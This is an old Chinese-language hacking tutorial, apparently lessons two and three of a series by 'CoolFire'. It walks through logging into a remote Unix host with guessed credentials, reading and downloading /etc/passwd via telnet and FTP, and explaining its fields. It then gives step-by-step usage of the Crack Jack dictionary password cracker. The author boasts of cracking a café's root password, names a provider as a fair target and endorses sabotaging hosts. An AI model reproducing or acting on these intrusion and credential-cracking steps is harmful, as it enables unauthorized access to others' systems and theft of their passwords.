cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/ 
cool:/$ cd etc
telnet> quit
(好想睡呀 !! 不玩了 !! 下節課再開始....)
Connection closed.
ms.hinet.net> exit

(走了 !! 下節課在見啦 !! 今天就上到這里 ! 老師要先下班了 !!)
(有學生說: 騙人! 還沒有破解呀!! 胡說 ! 不是已經進來了嗎 ???
看看這節課上的是甚麼??? ---->進入主機 !! 嗯.....)

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

上節課抓回來一個 "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所
抓回來的能是甚麼好東西?? 所以這一節課繼續上次的攻擊行動. 上節課我們已
經 "猜" 到了一個不是 guest 的 username 及 password. 今天就以它來進入主機瞧瞧
!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 進來了 ! 開始攻擊吧 ! 本次的目標是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址,
有作筆記吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

cool login: fuckyou
Password: (一樣輸入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@

(找尋目標..... 太亂了 ! 懶得找, 再來 ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有沒有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正點 ! 一點都沒有防備 !!)
cool:/etc$ exit
logout
(走了!.... 換 FTP 上場 !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit

(閃人羅 !! 下課 !!.... 喔慢點, 還有事要說明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 檔中, 而你原先在第一節課
所看到的這個格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因為密碼的部份沒有東西.... 所以拿了也沒有用 !! 但這一節課所拿到的東西呢,
像是這樣, 有幾點需要說明的, 就是它究竟代表著甚麼???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成幾個欄位, 各欄位對照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

了了吧 ! 了了吧 ! 保留著你千辛萬苦所拿到的 passwd, 咱們第三節
課再來告訴各位如何使用 Crack Jack 把 passwd 解碼.... 呵呵... 
zzZZzZzz... 

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Crack Jack V1.4 中文使用說明 (By CoolFire 12-1-1996)

嗯... 該到第三課了 !! 累了的同學先去喝口水吧!

這一節課咱們來說說 Crack Jack ! 這可是個解讀 /etc/passwd 的好工具喔,
不要告訴我你習慣用 
Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包準你馬上投向 Crack Jack 1.4
的懷抱, 但請
先確定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到這個版
本的 Crack Jack ! 這才是真正有用的版本, 速度... 對... 就是這點別人都比不上 !
但還是要講
講它的缺點... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上開個 DOS Mode 跑,
它可是連
理都不會理你的 !

OK! 現在切入正題 ! etc/passwd 拿到手了吧 !! 開始羅 !! 使用 Crack Jack 1.4
前所需要的東
西有這些 [1] Crack Jack 1.4 (廢話...$%^&@@) [2] /etc/passwd 檔案, 你可以在 Unix
系統中
的 /etc/ 目錄中找到 passwd [3] 字典檔 (哪里找, 自己敲... 呵 ClayMore 中有一份
DIC.TXT
是有一千多個字的字典, 但比起我的字典可就小巫見大巫了, LetMeIn! 1.0 里面也有, 聽
James
說 2.0 Release 的時候會有更棒的字典檔含入, 期待吧!).... 使用 Crack Jack 1.4
前需先確
定你所使用的機器是 386 含以上 CPU 的 ! 然後最好有充足的記憶體 !!

開始 Jack 時只要敲入 JACK 即可, 它會問你 PW Name... 輸入你的 passwd 檔名,
Dictionary
Name 輸入你的字典檔名, Jack 就會開始找了 ! 找到時會告訴你, 也會在 JACK.POT
中寫入它所
找到的密碼 !! 但... 有點怪的格式! 如果找到的是具 root 權限的密碼, Jack 會告訴你
This is
JackAss... 嗯...說臟話了 !! 因為使用 Jack 占用的時間實在太多,
如果你中途想要停掉時只要
按下 Ctrl-C 即可, 別以為你前功盡棄了! 因為 Jack 有個 Restore 的功能,
中斷時會自動存檔
為 RESTORE, 下次要繼續這次的尋找只要輸入 Jack -Restore:RESTORE 即可 !!
當然你也可以為
你的 Restore 重新命名 ! Jack 也會找得到的 ... 如 Ren restore restore.HNT
之後要再尋找
的時後就 Jack -Restore:RESTORE.HNT 即可... Jack 會很自動的 Restore
前次所尋找的字串...
繼續幫你找下去....

字典檔哪里找: 我的不給你! 可以找別的 Brute Force 之類的程式, 有些里面會附,
或是找找其它
的 Hacker 地下站看看有沒有, 自己編一個, 或找個英漢字典軟體將字典的部份解出來,
可能要有
一點資料欄位及寫程式的基礎.

[這一節課沒有范例] 成功的案例: 找到過某家網路咖啡店的 root 權限密碼 ! Jack
好正點呀 !!!
所花的時間: 20 分鐘左右... 但也有找了一兩天也找不到的..... 嗚... 駭客們! 加油吧
!!


------
最近比較沒空了 ! 因為要趕其它的報告, Home Page 也沒有太多時間整理,
更別說是寫這些說明了,
但是太多網友需要, 我只好兩肋插刀... 差點昨天就交不出報告了 !!
如果你有興趣寫其它程式的中
文說明, 請完成後寄一份給我, 我將它放在 Home Page 上面讓其它人參考,
當然你也可以給我你的
使用心得, 讓別人參考看看也行! 另外 CoolFire 目前準備收集一系列的 System Hole
List, 如果
你在其它的站臺有看到的, 請把它先 Cut 下來, Mail 一份給我 !
這樣我才能弄出一份更齊全的東
西呀.... 還有... 在想弄個 Mail List... 唉.. 不想這麼多了! 有空再說吧!

------
再次重申, Crack 別人站臺之後不要破壞別人站臺中的資料, 此篇文章僅作為教育目的,
不主張你隨
便入侵他人主機.... (當然 高-Net 除外, 我恨死它了)... 請勿將這類技術使用於破壞上
(又.....
如果第三次世界大戰開打, 你可以任意破壞敵國的電腦網路... 我全力支持),
最嚴重的情況(如果你
真的很討厭該主機的話)... 就將它 Shut Down.... 好了! 別太暴力了!

CoolFire 在 hotmail 的 ID 被別人搶先一步, 所以我的 ID 就變成 CoolFires 了 !!
真是 XO...